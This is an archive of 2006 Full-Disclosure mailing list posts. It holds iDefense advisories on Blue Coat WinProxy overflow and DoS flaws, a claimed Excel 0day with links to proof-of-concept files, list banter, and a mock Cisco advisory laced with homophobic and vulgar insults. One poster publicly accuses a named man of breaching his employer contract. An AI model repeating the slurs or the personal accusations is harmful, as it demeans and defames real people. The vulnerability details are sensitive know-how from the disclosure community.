7HXG4YS5bJNKO+ObvB0AZrLgWuDSPkdgds4ecmjXGiQROWWxhz3E9mMcb1rNxobK
VU2UkzxasKQAHUGhy9Suvg4tAPHWhvF3UlrLY4pu08fDuTOhrT1U/BIdiJR1GWKW
pTpkDVnUO0Q=
=PKG1
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Unofficial Microsoft patches help hackers, not security

2006-01-04 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
everyone knows the best official patch is firefox, netdev is correct
here, this is not a good idea to spread untested patch, someone will
release a patch soon totally removing your IE hu ;>

Morning Wood wrote:
> this happened with the last pnp exploit
> one of the worms patched the hole,
> thus ensuring their malware stayed,
> and the box was no longer vuln
> ( to the competition??? can we say adware? )
>
> looks like a growing trend.
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7xBca+LRXunxpxfAQL51RAAxlvdP6X16lalTYdbwPYnsgkD9GfKN/vI
VbdJqZ6koiywfpElKy4wNTm+n2dNI5nVpcnFvJsIvq5x1pj1zlW+sT9noLBTromr
gIllKGgkOQGYPIi+sns/B8fluQIz+Zws7vJsprK+p+0X4PY8Wb3lBSYgo6ko1g+u
rr4rWit38onJDkOkZDfRVZlBJUVLU4Q4KfenHE/VoZTXi7F0RIyL2aFUstltDZrl
W9RBLJGrpqWYKftZmVtyxPfQeeUifA5rf4Z/+tCOl7+poCJYmazGmd76WW729/fl
ZrFNAUmfu36kxGo6UpUWA7wEouJ99d3a4+ifUJoyk+M+ENbOKJMHYExaezjQnW7w
/eKPS5LYrqUl+pm9MWdhpEQuF+fNs7wAFnQv264YzgN5BVV/JLGfWLJOGiU67FV/
6d/8zWOQ7SlMShDmAFfF6DlXyu+IQ/dRviWrDlPD7/3FJei31/SZoKqd3ECdEnT3
TYkamSX8jpUnJE4O3CPiyuA2NRmNqYz/h1jjN3QI4Y1MGD5I+vnVpA/DlFI/V3OR
hEWEmIpSbasLoQaVqXdIa+qCXbj3IFjXeDfJ09TXSHw1S0dQP3p94x1z6ZnuKunx
UL/hpu8xzdISqe42x8kaVUSb+d512J8L+Et2yF+jHiFrqEluLn2ku+I21rfLTXlN
wFGaJpg3CS4=
=2sA7
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 01.05.06: Blue Coat WinProxy Remote DoS Vulnerability

2006-01-05 Thread [EMAIL PROTECTED]


Blue Coat WinProxy Remote DoS Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
January 05, 2006

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing Winproxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendors site at:

 http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a design error in Blue Coat Systems Inc.'s
WinProxy allows attackers to cause a denial of service (DoS) condition.

The vulnerability specifically exists due to improper handling of a long
HTTP request that is approximately 32,768 bytes long. When such a
request occurs, the process will crash while attempting to read past the
end of a memory region.

III. ANALYSIS

Successful exploitation requires an attacker to send a specially
constructed HTTP request to the WinProxy server on TCP port 80. This
will lead to a crash of the server and it will be unusable until it is
restarted.

This vulnerability may only be utilized by attackers who have access to
the network segment that contains the listening daemon, which in some
cases is a private local area network.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. Blue Coat has
reported that previous versions are not affected.

V. WORKAROUND

iDefense is currently unaware of any workarounds for this issue.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3187 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/12/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

FistFuXXer is credited with the discovery of this vulnerability.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 01.05.06: Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability

2006-01-05 Thread [EMAIL PROTECTED]


Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
January 05, 2006

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing Winproxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendors site at:

 http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Blue Coat
Systems Inc.'s WinProxy allows for the remote execution of arbitrary
code by attackers.

The vulnerability can be triggered by sending an overly long Host:
string to the web proxy service.

III. ANALYSIS

Exploitation of this vulnerability is trivial. An overly long header
directly overwrites the SEH handler for the frame allowing for control
over EIP.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. All previous
versions are suspected to be vulnerable.

V. WORKAROUND

Disabling the WinProxy web proxy protocol will prevent this attack.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-4085 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/07/2005  Initial vendor notification
12/08/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by FistFuXXer.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 01.05.06: Blue Coat WinProxy Telnet DoS Vulnerability

2006-01-05 Thread [EMAIL PROTECTED]


Blue Coat WinProxy Telnet DoS Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=365
January 05, 2006

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing Winproxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendors site at:

 http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a design error in Blue Coat Systems Inc.'s
WinProxy allows attackers to cause a denial of service (DoS) condition.

The vulnerability can be triggered by sending a large string of 0xFF
characters to the telnet proxy port of the server. Sending such a string
will cause a heap corruption in the Winproxy process causing it to
crash.

III. ANALYSIS

Successful exploitation requires an attacker to send a stream of TCP
packets containing the 0xFF character to the WinProxy telnet server on
TCP port 23. This will lead to a crash of the server and it will be
unusable until it is restarted.

In lab tests, the heap corruption caused by this exploit led to cashes
in random locations in the process. The possibility for remote code
execution is possible, however will likely be very hard to control and
maintain reliable code execution.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0.

All previous versions are suspected to be vulnerable.

V. WORKAROUND

Disabling the WinProxy telnet protocol will prevent this attack.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3654 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005  Initial vendor notification
11/15/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: RE[Full-disclosure] WMF Risk Analysis for Win9X anyone ?

2006-01-06 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
I don't know why since this wmf flaw some ppl are requesting a hotfix
for an os wich anyway , as a lot of remaining IE bugs unpatched.
there is tons of warez websites wich will install you spywares on a
fully patched win9x and this so far before this .wmf bug ...
You should wake up  if you are seeking for a 9x patch :)

Technica Forensis wrote:
>>> What ARE the real risks (or lack of them) for Win9X/ME systems ?
>
> I think the risk he is that they are running Win9x/ME.
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ77cXq+LRXunxpxfAQJFOxAA5iJt8F4Nf4m6mYigiJ+jYgBSUMnsospG
pvXZsJ4KTNgjdTl7Ntc9dW5ZCtr9MdcERstNWLSznJCykqZgHcUwA6aa32BeMxwz
OwNK/iYt2RppRXyQtkIgcLYRVdioKGisdIFXzTxB7Y9m5ddc/FW9fsL/Mqvab6GZ
AJNwrMQDB3Kouqvo2HIDPLHBxwl5HozNmoGx7O45uXOIdHeVClywyOEsURCBi7ye
tXQ+OT2mH7RB3yx5RZrjijeeN6i4/P6Ronf8tg4iwqoA9xJ8D0N5CJyq9JlFvKFr
EzR+/eCDVw8U+O7bIgQlUxUrFRsfr6e283B/uMH4vCLn0cztNO9bzR36vf2e6Uoa
LUDq1nDskMXICPxCygLon3ZMb2AELVHdVEgt4XIHM+aVNAAY/M98/5hZx6CrnmBH
exFFgHGt/Ic51m0Vt0hVhQmWqxgYq/VUw46tB2Jf2Ou7sAkax5tyJHIEAffCJBlV
Gbc4aGx4uO5/vt2FqoZyYLJ76n2JrLQYKNqG2gaAF822WX0kmi88yxugyZadjbcu
5rbu+p2Ck0UVqShQGS/p6/3dge1ZNlDCmXqm4ONoxXNaMOhmAnioT1q50/cMHGjQ
rkXEaqKtytlALJ8Hag9aelDb0A+hHiNME0nrA7UB54bUXbBaJFuu6BucDNe74Nea
B/Tgl0h3XVw=
=fiRO
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: what we REALLY learned from WMF

2006-01-07 Thread [EMAIL PROTECTED]

Gadi Evron wrote:

>
> I am not criticizing Microsoft over the patch. I am happy.
>
> I am just saying that we as an industry got used to False Positives,
> slow responses, etc. We should demand more and this situation proved
> it is possible.
>
> Gadi.

Ja, all we have to do is write the patch for them, then we have great
turn around ;-)

Seriously though, I think the fact that someone else duplicated their
patch (file date in the patch of the 28th shows this, as well as the
bindiff) then they had pre-hotfix-release information on what bugs
occured due to the removal of this abortproc wmf "feature" on a very
large customer base (300GB of uploads before the site was taken offline,
thats a _big_ test user base) was what made it possible for MS to
release the patch earlier than promised.

Still though, Gadi is right that this shows if there is enough demand
for an RC1 patch, they may release them as long as the exploit can
be googled beforehand and MS doesnt have to worry about ppl RCE'ing the
beta patch and creating an exploit as a result of their program.

a lot of "ifs" but it can happen

-JP
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] location

2006-01-07 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
looks like you also need to update yourself randall m :> here are
correct links:

Official archives: http://lists.grok.org.uk/pipermail/full-disclosure/
Charter: http://lists.grok.org.uk/full-disclosure-charter.html

How to subscribe to this list:
View https://lists.grok.org.uk/mailman/listinfo/full-disclosure

Address to post to this list:
full-disclosure@lists.grok.org.uk



Randall M wrote:
> Someone needs to have Neohapsis update their information:
>
> http://archives.neohapsis.com/archives/fulldisclosure/
> Official archives: http://lists.netsys.com/pipermail/full-disclosure/
>
> How to subscribe to this list:
> View http://lists.netsys.com/mailman/listinfo/full-disclosure
>
> Address to post to this list:
> full-disclosurelists.netsys.com
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> .
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ7/w0q+LRXunxpxfAQK7HQ/9HcT72Wo+6VCaZ9Hz0B20aVE/meX8dssB
iq8vRw6GIda2cJai8FImNn5hXNR/dQG2f+Gbdq1S1YvsfoJcd4w/0mWCzxzCcNS3
+jym6jy7H3Zj2BzLX7JoqWZ7Fv+ePAueGinqWZ8kLHUge6rnPpew57NWkUfS2CfF
oI+GBYjILKJRK7eqZZQkM2S2lQcIGZ4ZiaSfEcZT2IBOiIsHarwkT1H/6hEglVki
Z2dbr1Ht6wFGwHW5wyFo+jPfPXfN16PetF+Jkwu3wh9l6TVhE3ceLbV1pVheDVBC
Aflrkv/otWPqujSCl3MVa6SrfSeaULouuTH2kW5DkT+8Gp1NMHckSt5SNz7khxYx
RJrmt+9bv/32/KKBTEPh9kVCR2OM/VaCvI4LYK2z3Hw694rKCJkz9DZ13oPbHtJ8
4YxjySasxwoN0TVMeMY9KcLVDmGWxCB9VaEP8Psfu5y3kmrzX66aSJCC7dLb7/9v
f5pt/JMs/9B+pIykRBXiK8K/oslA0+2oxuEEd10CQQjYxkaIRh89RE7BUfAcYqxe
ARnAvBqPxuardC8bQAVGJ2N2Ru2S2ejOYWY1Cn3Q1nqvKKCAEiRtZktu89oS5Bzh
7cLe4jmjfoTRdM1rk51rKmMSArplMEGOuprcjOKttXfI4Vftws6sIWeNvLetNBp6
29PduO28Gd4=
=9CnM
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

2006-01-08 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
after many hours working on excel I have found a
critical excel bug exploitable. This is not a stack bof
nor a heap bof , a bug extremely hard to find and trigger , but it
conduct excel to execute any arbitrary codes while opening a malicious
.xls file.

note: the bug isn't related to both excel dos that I have already
published but shows similiar to a null pointer bug at a first look.
much infos won't be disclosed publicly or privately and this will be
transmitted to ms before the spyware loosers catch it :)

> I have said so this is only null pointer bugs but the way I trigger
> the bug might be modded for a remote code execution who know , I'm
> not a guru and maybe did an error triggering the flaw who knows :)
> but I bet many are already reasearching on this hehe, happy job!



> Let's go on the fast publishing :) I wont bother to message
> microsoft about this because they wont patch it for sure according
> that they can't patch fully exploitable bugs in a decent time, they
> do not patch IE dos (http://heapoverflow.com/IEcrash.htm), so no
> way to bother them, we should let them sleep a bit shhh ;)
>
> Bugs 1 and Bugs 2 are quite similiar but NOT, both are null pointer
> bugs . In bug1 you should mod a grafic's pointer to point to a bad
> area, and in bug 2 you should null out the size of the page name.
>
>
> attached are the 2 pocs, nor here are direct links
>
>
> http://heapoverflow.com/excelol/bug1.xls
> 
> http://heapoverflow.com/excelol/bug2.xls
> 
>
>
>
> Credits:
>
> AD [at] heapoverflow.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ8ErWK+LRXunxpxfAQKIpBAAy8SiDvsMWMj5/QM9R8J0ajpYnJ734Z9D
GG/yJiST2wMBp0Pcv+h0teWrzT6YdkljqePjPrE8pkEUnUww7w34SyhqMMWga9Qw
tDMfabtcUmHUNkeNf1rcB5keN4ARZ6JLr76FRK+fluG1yqEzrmZ0tkdHsYzUgl59
96oX5XNVeX+xdYimDNmvlTCzHJrLNHMXFHHX8ZKxZvSiQGR6FI9cFVOgTOcPqq4N
mV0BJPg8dzPuhYQHQ9d0qgtgbeaPzD1t1wbvXyxQqdLasCtARds8R0ylDmmw5e0l
Mi01buZHnY7egVhgELQC+K73C2gH9PcqNG+udIzc2Y6pQf6outiN7bqjBohHGlzN
ZrnOuDAcMCoaBRAXvAmhCh6AyTWsn2mpAGrCFr1WZha2s2uaksOzqwrys6fvE2hI
p1A9KFFdgDrjwHtTqQ1g96WuDEz0pH2lDUO94vgB3q1jR/dHYp6EUy3MTlYQxgXE
X6fnwqWmMf3uuwT49POU0d4rtaCTx5rj3ITXI21i194Pu5IGGJ/WcsMpX7/VKZTN
ltfAb1AaEt4qw89KOk9pKYC+snLxMlD+XcXsEtDHglWu/7KuCieK6hNGSheCFuQM
Jr2J7u9empdF4ni5KECzwcUpjBfB7UejSzTcf5AeGHqjHc9AewXoumIL7p7uFGsL
GCVh5qqmxas=
=cf3L
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] 2x 0day Microsoft Windows Excel

2006-01-08 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
no I guess there is some interesting responsible programs over there
wich will be interested acuqiring it for a few zero before the $ ;)
Im not enough crazy to give it on ebay if that's what do you need to
now sorry he.


Georgi Guninski wrote:
> will there be a chance of bidding on something more reliable than ebay?
>

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ8Fl8K+LRXunxpxfAQIGxxAAuykTxJ7BZAb1B6dnUmv8yrg96lS8y5XH
GY5xuJTh5YPaBFxPO1wEPtSGeFiG98hhSnudGsg8m6hlG/A8Iqr5IMhm+azQ5Rk6
rs6SS3eL7oFqOe822Dmc157SKEfEKhPeJGsqV9vuF7p6oBBh5zJahuZJQoV3oIk7
ygHsaLxMrXs7dXdHBIdFOaWX8gB1m3xpO4ZPcx++5H2Y58CxNigl9pajgPD6pC7d
vr8bUtIFXFzWeIyJOzpp8qbuF5DRXRRTxRZ6y+ZXNXOfHa1yyAI0YAR0LtPCDrlc
C3QYeGO2LRfWd+xnhpVYIXr7w82GSEWPZF+6sc4hYkzi+ugTmgrWYrF11F9H7BYG
/U2w6fBWo7Hdp9DvZfbo+cRgTrS+87F+wwn5YR2tCfepm82hHllMN95Xsaf/z3hO
qqoo10VW2V/n/+5qG/+UuHsBN5mr3dVDJcBhv6KatFq9HcT1LGoCxwoZIxnU+G3h
XkGZr+hNQtTP2nEqI7UrTrJ/ENZfPnaUOe/us93DSS/AlhRp82lor9KGATdLzek4
7jFHJgwmMH3F478WUy1bp57MBFwT16IjCBBHuyB3D/nkBG5bDDL1SLQZaFNHGV2q
b0kqz4kZQqLwBKmVkUjo+rsa/wAFGNL/VaARNkcuGtHhP/wcEn8wd+y0hNUqSbvd
XpZ4OPjcEIM=
=8DUn
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Open Letter on the Interpretation of "Vulnerability Statistics"

2006-01-08 Thread [EMAIL PROTECTED]

InfoSecBOFH wrote:

>Actually George and is one up on me because he also posts nothing of
>value anymore.  So here is a question, do you suck every former and
>undeserved internet rock star's dick on this list or just the
>eurotrash ones?
>  
>

Do you have a fetish or something? Do you whack off after emailing a
particularly vulgar email to a public mailing list? Do you post then
stroke the roast? One wonders from which such passion expressed
constantly in public comes from, just make sure you clean your keyboard
off afterwards

That'll be $3.50 for the erotic email, i'll just bill your parents as usual

-JP
"That man is a pervert"
-J.T. Ripper
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDefense Security Advisory 01.09.06: Multiple Vendor mod_auth_pgsql Format String Vulnerability

2006-01-09 Thread [EMAIL PROTECTED]

www.redhat.com/archives/fedora-announce-list/2006-January/msg00015.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2005-3656 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

11/15/2005  Initial vendor notification
11/22/2005  Initial vendor response
01/09/2006  Coordinated public disclosure

IX. CREDIT

The discovery of this vulnerability is credited to Sparfell.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FWD Cisco IOS Remote Command Execution Vulnerability

2006-01-09 Thread [EMAIL PROTECTED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
Im sure it's a fake , there is the word "InfoSecBOFH" in it several
times :


terry comma wrote:
> -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Symantec
> Vulnerability Alert Cisco IOS Remote Command Execution
> Vulnerability Bugtraq ID 16069 CVE CVE-PLH-NOMATCH Published Jan 09
> 2006 6:22:69 PM GMT Remote Yes Local No Credibility Vendor
> Confirmed Classification Access Validation Error Ease No Exploit
> Required Availability Always Impact 9.3 Severity 8.1 Urgency Rating
> 9.4 Last Change Cisco has responded to this issue; see Technical
> Information and References for details.
>
> Vulnerable Systems - -- Cisco IOS 12.2 T Cisco IOS
> 12.2 SZ Cisco IOS 12.2 SY Cisco IOS 12.2 SX Cisco IOS 12.2 S Cisco
> IOS 12.2 MX Cisco IOS 12.2 MC Cisco IOS 12.2 MB Cisco IOS 12.2 JA
> Cisco IOS 12.2 DX Cisco IOS 12.2 DD Cisco IOS 12.2 DA Cisco IOS
> 12.2 CY Cisco IOS 12.2 CX Cisco IOS 12.2 BZ Cisco IOS 12.2 BX Cisco
> IOS 12.2 BW Cisco IOS 12.2 BC Cisco IOS 12.2 B Cisco IOS 12.2
> 12.2XU Cisco IOS 12.2
>
> Short Summary - - Some Cisco IOS versions are allegedly
> prone to an issue that may permit gay people to execute arbitrary
> commands from a password prompt.
>
> Impact - -- Remote attackers with small dicks may allegedly
> execute shell commands on a vulnerable device without needing to
> authenticate.
>
> Technical Description - - It has been alleged
> that it is possible for remote attackers to execute arbitrary
> commands without proper authorization. Reportedly it is possible to
> execute shell commands from the password prompt on a device. The
> attacker must have a small dick and be able to connect to a
> vulnerable device via telnet, although it has not been ruled out
> that bigger dicks may present other attack vectors. The discoverer
> of this vulnerability has stated that it is possible to exploit
> this issue by inputting 'IamGay!' at the password prompt. Cisco has
> replied stating that only InfoSecBOFH is gay enough to exploit this
> issue. Details are available to registered Cisco users at:
> http://www.cisco.com/pcgi-bin/Support/InfoSecBOFH/ishegay.pl?bugid=CSCdr16069
>
>
> Attack Scenarios -  The attacker must identify a
> vulnerable device and be in possession of a small dick.
>
> Exploits -  There is no exploit required.
>
> Mitigating Strategies - - Block InfoSecBOFH
> access at the network boundary, unless the service is required by
> external third party gay porn sites.
>
> Solutions - - Currently we are not aware of any
> vendor-supplied patches for this issue. If you feel we are in error
> or are aware of more recent information, please mail us at: vuldb
> at securityfocus.com .
>
> Credit - -- Discovery is credited to InfoSecBOFH at gmail.com
>
> For help with interpreting the meaning of any of the sections or
> labels in the alert, please visit:
> https://alerts.symantec.com/help/sia-users/vulnerability-alert-pdf.htm
>  View public key at:
> https://alerts.symantec.com/Members/gnupg-sigkey.asp Symantec
> Corporation The World Leader in Internet Security Technology and
> Early Warning Solutions Visit our website at www.symantec.com
> 
>
> ___ Symantec Deepsight Alert Services
> Powered by EnvoyWorldWide, Inc.
>
> --
>  Yahoo! Photos Ring in the New Year with Photo Calendars
> .
>  Add photos, events, holidays, whatever.
>
> --
>
>
> ___ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ8Lik6+LRXunxpxfAQLJaBAAvOi5Mk+AFH20g7nDykqxr6MUeRymI6hu
IT0smT4zRFaWVPAwJ9dDNzYiEirGTp9Ntu4Z0gg3XKyRRHE6z4h/VP7JesSx38BY
VexIf60ozah8BKCef/V7CTEX2xUTd5ePVhYkVUpfinN7QeWaDywTFArzohuCAGFP
iIGCWwdVogX92ouo8JkOjvVJV/jFF8dzIwzKbzkCG63ut9dssCiwJ9CzNiQc3ugJ
pF2Ml10g/fbfi8qR+X+JOO3CZjGnzFYZYHqyFB2dkrR5WX8DerYDzjbWGJQWWPpX
mmWTmEyD6Obl6lSoswnu+cO9cfZ8o6/YReBN43jMMznTnCGTFviFonGgQLFaAGvL
9OxkpEDdRVmX5awwLOKAejfkBpjcAeswQMRf0Obv45R8+lPNz60WsvDGH7L+UDwk
w5HdtTUplTo+TjAQS7aygGl5cgArCFJ77GVKUt41FCd5mwOqyXh60OyCmXyqLbRJ
rnMHTGlDLRflhZq/0no1P7pz+FjPhZZFGcMKQzs3wUWuLrzV1uQK2LTFebDoUXGh
J0DitlEkq0laQ0V0sGYWB/XlsRUP0iVx6snMZrZ7+uNzFerEWx5NnVFG7RpPYFcF
Tk/9w4ChIGOAZEQkpwGj4xgOeZVpBHK+E+SCjKdkqUBRi+M8gGDg90oFkQi/YtS7
Vao9kgMakoU=
=1vmI
-END PGP SIGNATURE-


___
Full-Disclosure - We belie

[Full-disclosure] Gerald Eisenhaur


Is a great Reverse Engineer. Worked at Cisco, helping them with Cisco
Security Agent. He left his job to get a better paycheck at webroot,
working on their advanced threat research team. Before going to webroot,
he signed several agreements, not the least of which was a non-compete
agreement.

4 Months ago, Gerry contacted me. He said that if I came to Boulder, he
wouild pay me 50k up front to help him with a 1/4 mil contract he had
gotten RCE'ing csa 5.0 for cisco. He has since decided not to pay me
(after I quit my job and moved to CO in order to help him).

Because of that, I have decided to tell his employer that he is in
violation of his contract, and is activly helping their competition
while collecting a paycheck from webroot.

Merry christmas Gerry, have fun being homeless like me. Maybe you will
think twice before ruining someone elses life next time.

-JP
"from the heart of hell, I stab at thee"

P.S.: I dont care if you kill me, at this point, you would just be doing
me a favor
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gerald Eisenhaur

InfoSecBOFH wrote:

>Wow... script kiddy bullshit.
>
>1.)  Who gives a fuck
>  
>
me

>2.)  Who gives a fuck
>  
>
gerry

>and
>
>3.)  Who gives a fuck..
>
>  
>
webroot

>Take your personal bullshit to yourself and not stupid mailing lists. 
>I don't give a fuck if god himself fucked you for 1.00 let alone a few
>K.
>  
>
lol, this coming from you of all ppl, it would only be more ironic
coming from netdev.

>Perhaps if you had a clue or if the person that fucked you had a
>clue.. you would not have gotten fucked...
>  
>
No shit Sherlock, obviously I am an idiot or else I would still be in my
house working at my (formerly) great job, rather than sleeping on a
pillow made of packing peanuts using my coat as a blanket.

-JP
"where do you want me to go today"
-JP
___
Full-Disclosure - We believe in it.
